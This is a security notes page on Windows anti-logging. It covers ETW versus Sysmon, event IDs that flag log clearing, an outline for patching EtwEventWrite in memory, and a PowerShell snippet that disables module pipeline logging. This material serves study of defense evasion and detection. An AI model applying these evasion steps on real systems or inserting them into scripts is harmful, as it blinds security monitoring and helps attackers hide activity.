All notes

Anti-logging techniques

1. Event Tracing for Windows (ETW)

Logging and monitoring solutions creates a physical record of activity that can be manually analyzed for malicious activity. In general, a monitoring solution will begin at the host device, collecting application and event logs. Logs are usually forwarded from host machine to an event collector (central server) - a SIEM (Security Information and Event Manager) system.

An attacker can control the logs which are stored on the device. The primary target might be Event Tracing for Windows (ETW) component. Almost all event logging capabilities within Windows are handled using built-in ETW (application and kernel level) component. ETW has visibility over a major part of the OS and logs almost every OS-related action. ETW is a core component of the Windows operating system, and it cannot be completely disabled.

Event ID is a core feature of Windows logging subsystem. Almost every action in Windows has assigned a corresponding event ID. Check out list of all event IDs.Events are stored in XML format.

There are event IDs to detect log tempering attempts:

  • 1102 - Windows Security audit log was cleared.
  • 104 - Log file was cleared.
  • 1100 - Windows Event Log service shut down.

1.1. ETW vs Sysmon

ETW and Sysmon are both tools used for monitoring and logging events on Windows. ETW is built-in Windows feature. Sysmon is part of SysInternals toolkit. It's primarily focused on security monitoring and threat detection. It's designed to provide detailed information about system activities to help detect and investigate security incidents. ETW is more general tool, not so security-focused - it logs performance, debugging and diagnostics events as well.

Sysmon logs are specifically focused on identifying potential security threats. Sysmon requires configuration through XML files to specify which events to monitor and how to log them. Sysmon introduces some additional overhead on the system. ETW has minimal impact on system performance.

1.2. Usage

# Get ETW events in PowerShell 
Get-WinEvent 

1.3. In-memory patching

ETW functions are loaded with ntdll.dll. The DLL is placed in the user-space memory. It's possible to patch EtwEventWrite function in-memory to return from it before the actual ETW event is saved.

  1. Get address of EtwEventWrite function (LoadLibrary and GetProcAddress).
  2. Change permission of DLL memory pages (VirtualProtec).
  3. Patch function's opcodes.
  4. Reset memory permissions.

1.4. Powershell Log Pipeline

The script below can be appended to any PowerShell script to disable module logging of currently imported modules.

# Get target module
$module = Get-Module Microsoft.PowerShell.Utility
# Set module execution details to false
$module.LogPipelineExecutionDetails = $false 
# Get target ps-snapin
$snap = Get-PSSnapin Microsoft.PowerShell.Core
# Set ps-snapin execution details to false 
$snap.LogPipelineExecutionDetails = $false